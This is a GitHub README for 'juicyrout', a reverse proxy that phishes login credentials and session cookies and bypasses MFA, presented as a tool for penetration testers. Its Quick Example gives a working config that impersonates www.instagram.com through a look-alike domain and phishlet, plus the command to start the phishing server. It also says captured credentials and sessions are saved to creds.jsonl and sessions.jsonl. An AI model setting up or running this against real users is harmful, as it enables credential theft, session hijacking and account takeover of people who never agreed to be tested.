v-byte-cpu / juicyrout

:tropical_drink: Phishing Reverse Proxy with MFA bypass
MIT License
16 stars 8 forks source link

juicyrout

License Build Status GoReportCard Status

juicyrout is a man-in-the-middle attack reverse proxy designed for penetration testers to phish login credentials along with session cookies.

It was developed after experiencing the limitations of evilginx2. The main focus is on the following things:

We use the following technical features to achieve this goal:

Quick Example

Let's imagine that you acquired a new DNS name, for example, host.juicyrout and you want to run a phishing instagram site on the domain www.host.juicyrout on port 8091. There are only three things you need to do:

Create a file config.yaml:

api_token: your_random_token_here
listen_addr: 0.0.0.0:8091
domain_name: host.juicyrout
external_port: 8091
tls_key: wildcard_host_juicyrout_key.pem
tls_cert: wildcard_host_juicyrout_cert.pem
phishlet_file: phishlets/instagram/config.yaml
domain_mappings:
  - proxy: www.host.juicyrout:8091
    target: www.instagram.com

For a complete list of configuration options, see config.go.

Finally, run a phishing server:

juicyrout -c config.yaml

All captured credentials will by default be stored in the creds.jsonl file, and captured sessions will be stored in the sessions.jsonl file.

Enjoy!